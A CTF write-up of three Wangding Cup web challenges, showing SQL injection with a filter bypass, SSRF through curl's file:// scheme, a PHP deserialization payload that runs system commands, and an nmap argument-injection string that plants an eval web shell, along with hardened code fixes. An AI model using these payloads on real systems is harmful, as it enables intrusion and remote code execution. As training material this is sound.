CTF - Wangding Cup (网鼎杯) Past Challenges
2022-08-02 04:02:00 【SevenCold】
1.[网鼎杯 2018]Fakebook
Opening the link shows a forum-like web application with login and registration. I first tried SQL injection on the login form, which failed; then I went to register, and while registering I thought of XSS, but testing showed that was not feasible either. So there was nothing for it but to log in and look for bugs from the inside.
After logging in I noticed that the username is a hyperlink; clicking it leads to a URL that carries a parameter.
That naturally suggests SQL injection again, and testing confirmed it works. From there it is the usual process: first use order by to find the number of columns, then dump the database name, table names and column names in turn. (Along the way I found that the backend filters the combination union select; after some testing, putting /**/ between the two keywords, i.e. union/**/select, bypasses the filter.)
The column names obtained are as follows.
Among them only data is not self-explanatory; looking at its contents, it is a serialized string.
That is as far as I got on my own, so I went to read the writeup. A directory scan finds robots.txt and flag.php; opening robots.txt reveals a backup of a PHP file, which can be downloaded and opened.
The most important part of it is the get function. Checking the curl documentation, get simply opens a URL with curl, and that URL is the blog URL from our profile. So the vulnerability here is not file inclusion but SSRF: curl accepts any scheme it supports, including file://, so we can set the blog URL to file:///var/www/html/flag.php and have the server read flag.php for us.
The resulting page contains a base64-encoded string; decoding it gives the flag.
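To make the get function's problem concrete, here is an added example (my own reconstruction, not the challenge's backup file): a curl fetch that hands the stored blog URL straight to libcurl, next to a hardened version. The function names, the option choices and the sample URL are assumptions for illustration.

```php
<?php
// Added example, not the challenge's own code: a reconstruction of the
// curl-based fetch the writeup describes, beside a hardened version.
// Function names and the sample URL below are assumptions for illustration.

// Vulnerable pattern: whatever the user stored as their blog URL is passed to
// curl unchanged, and libcurl speaks file://, gopher://, dict:// and more.
function get_vulnerable(string $url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $output = curl_exec($ch);          // returns the local file's contents for file://
    curl_close($ch);
    return $output;
}

// Hardened pattern: reject anything that is not http(s) before curl runs, and
// also tell libcurl which protocols it may use, for the first request and for
// any redirect it might follow.
function get_hardened(string $url)
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);   // no silent redirect elsewhere
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    $output = curl_exec($ch);
    curl_close($ch);
    return $output;
}

// Constructed input: the blog URL an attacker would store in their profile.
$blog = 'file:///var/www/html/flag.php';

// On a box where that file exists, the first call returns its source;
// the second returns false because the scheme is rejected before curl runs.
var_dump(get_vulnerable($blog));
var_dump(get_hardened($blog));
```

The scheme check alone does not make the fetch safe: http://127.0.0.1/ or a cloud metadata address is still an http URL, so a real fix also needs a host allowlist or a block on private address ranges. The example only closes the file:// path the writeup uses. On PHP 8.3 and later, CURLOPT_PROTOCOLS_STR with the string "http,https" expresses the same restriction.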
2.[网鼎杯 2020 朱雀组]phpweb
After opening the challenge, check the page source: the two form parameters are func and p. It then dawned on me that these might be a function name and its argument, so I tried it.
Capture the request with Burp and change it to func=highlight_file and p=index.php.
The guess was correct: the backend runs the function with call_user_func, but it blacklists a lot of functions, such as exec, system and so on (the list goes on; screenshot not taken).
My first thought was include combined with a PHP pseudo-protocol to upload a shell, but call_user_func cannot call include (it is a language construct, not a function). Then I wanted to bypass the in_array blacklist, but that did not seem feasible either.
Then I noticed that the code calls call_user_func in two places, and the call inside the Test class has no blacklist check. I guessed this could be the breakthrough point, but could not make it work for a long time and unfortunately ended up looking at the writeup again.
It turns out I had been on the right track: Test is indeed the breakthrough. The way in is deserialization, i.e. the unserialize function, so I wrote a PHP script:
<?php
class Test {
    var $p = "ls";          // argument handed to the function
    var $func = "system";   // function the Test object will call
}
$n = new Test();
echo serialize($n);
Send the serialized string (func=unserialize, p=<the serialized string>). The listing showed no file with an obvious flag name, so search for it with find / -name flag* as the command instead.
Then cat /tmp/flagoefiu4r93 to get the flag.
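The pattern that makes this work, as an added example (a minimal reconstruction from the description above, not the challenge's own source): a blacklist-guarded call_user_func for the request, an unguarded one inside class Test, the payload the writeup sends, and a fixed helper. The blacklist contents, the __destruct body and the helper names are assumptions for illustration.

```php
<?php
// Added example, not the challenge's source: a minimal reconstruction of the
// pattern the writeup describes. Blacklist contents, the __destruct body and
// the helper names are assumptions for illustration.

$disable_fun = ['exec', 'system', 'passthru', 'shell_exec', 'popen', 'proc_open'];

// Sink 1: guarded. Only the function name that arrives in the request is
// checked; what that function does afterwards is not.
function gettime_checked(string $func, string $p)
{
    global $disable_fun;
    if (in_array(strtolower($func), $disable_fun, true)) {
        die('Hacker...');
    }
    return call_user_func($func, $p);
}

// Sink 2: unguarded. The destructor trusts its own properties, but after
// unserialize() those properties are whatever the attacker put in the string.
class Test
{
    public $p = '';
    public $func = '';

    public function __destruct()
    {
        if ($this->func !== '') {
            echo call_user_func($this->func, $this->p);
        }
    }
}

// Attacker side: unserialize is not blacklisted, so func=unserialize with
// p=<serialized Test> passes sink 1, and the rebuilt object reaches sink 2
// when the script ends.
function build_payload(string $cmd): string
{
    $t = new Test();
    $t->func = 'system';
    $t->p = $cmd;
    $s = serialize($t);
    $t->func = '';   // neutralise the local object so its destructor is a no-op here
    return $s;
}

// Fix: validate at the point of the call, with an allowlist instead of a
// blacklist, so unserialize (and everything else not listed) is refused.
function gettime_fixed(string $func, string $p)
{
    $allowed = ['date', 'md5', 'strtoupper'];
    if (!in_array($func, $allowed, true)) {
        die('Hacker...');
    }
    return call_user_func($func, $p);
}

if (PHP_SAPI === 'cli') {
    // Constructed demo run: print the string the writeup sends as p.
    echo build_payload('find / -name flag*'), PHP_EOL;
    // O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}
} else {
    $func = $_REQUEST['func'] ?? '';
    $p    = $_REQUEST['p'] ?? '';
    if ($func !== '') {
        echo gettime_checked($func, $p);   // vulnerable path; swap in gettime_fixed()
    }
}
```

The allowlist closes the entry point, but the destructor itself is still a gadget: any other unserialize() of user data in the same codebase would reach it. Dropping the call_user_func from __destruct, or passing ['allowed_classes' => false] wherever unserialize() is unavoidable, removes the gadget rather than just one route to it.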
3.[网鼎杯 2020 朱雀组]Nmap
Comparing the web page's scan result with a real nmap scan, the two match, so presumably the backend invokes the nmap command, and we can pass in some unusual options.
-oN (normal output)
-oX (XML output)
-oS (ScRipT KIdd|3 oUTpuT)
-oG (grepable output)
-oA (output in all formats)
' <?= @eval($_POST[1]);?> -oG a.phtml '
Because the string php is filtered, use the short tag <?= ?> instead of <?php, and write the output to a .phtml file, an extension the PHP module still handles but which does not contain the filtered substring. Then, from the writeup, I learned that wrapping the payload in single quotes and spaces bypasses escapeshellarg() and escapeshellcmd() when the two are applied together (a pure knowledge gap for me). The mechanism: escapeshellarg() rewrites each ' as '\'' and quotes the whole string, and escapeshellcmd() then backslash-escapes the backslash that was just added, so the quotes come out balanced and the shell splits the inside of the "argument" into separate words. nmap therefore receives -oG and a.phtml as real options, and the grepable output begins with a header line that repeats the full command line, which is how the <?= @eval($_POST[1]);?> text ends up inside a.phtml.
Then connect with AntSword or China Chopper and find the flag.
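To see the double-escaping bug happen, here is an added example (mine, not from the writeup or the challenge) that runs the payload above through the two functions, lets the shell split the result, and shows two safe ways to build the command. The helper name is an assumption for illustration; the payload is the one the writeup uses.

```php
<?php
// Added example, not from the writeup: what escapeshellarg() followed by
// escapeshellcmd() does to the payload, and two safe alternatives.
// The helper name is an assumption for illustration.

$payload = "' <?= @eval(\$_POST[1]);?> -oG a.phtml '";

// Step 1: escapeshellarg() turns every ' into '\'' and wraps the whole thing
// in single quotes. The result is still one safe argument.
$arg = escapeshellarg($payload);
// ''\'' <?= @eval($_POST[1]);?> -oG a.phtml '\'''

// Step 2: escapeshellcmd() backslash-escapes the \ that step 1 added and
// leaves the quotes alone because it sees them as paired. The shell now
// reads ''\\'' as a lone backslash, and everything between is unquoted:
// the single argument has become six, including -oG and the file name.
$cmd = escapeshellcmd($arg);
// ''\\'' \<\?= @eval\(\$_POST\[1\]\)\;\?\> -oG a.phtml '\\'''

echo "escapeshellarg : $arg\n";
echo "both           : $cmd\n";

// What nmap would receive, split by the shell's own parser.
echo shell_exec('printf "%s\n" ' . $cmd);
// \
// <?=
// @eval($_POST[1]);?>
// -oG
// a.phtml
// \

// Safe 1: one escaping function only. escapeshellarg() alone keeps the input
// a single argument, so no -oG reaches nmap.
$safe = 'nmap ' . escapeshellarg($payload);

// Safe 2: no shell at all. PHP >= 7.4 accepts an argv array in proc_open(),
// so the target is one argument whatever characters it contains.
$argv = ['nmap', '-sn', $payload];
// proc_open($argv, [1 => ['pipe', 'w']], $pipes);

// Either way, validate the target: a hostname or IP literal has no room for
// quotes, spaces or a leading dash (a leading dash would be read as an option
// even when the value is passed as a single argument).
function is_scan_target(string $s): bool
{
    return (bool) preg_match('/^[A-Za-z0-9.\-]{1,253}$/', $s) && $s[0] !== '-';
}
var_dump(is_scan_target($payload));   // bool(false)
```

Running the script on a machine with PHP shows the two transformed strings and the six words the shell produces; the `printf` line stands in for nmap so nothing is scanned or written. The point to take away is that escapeshellarg() and escapeshellcmd() are alternatives, not layers: applying both undoes the quoting the first one built.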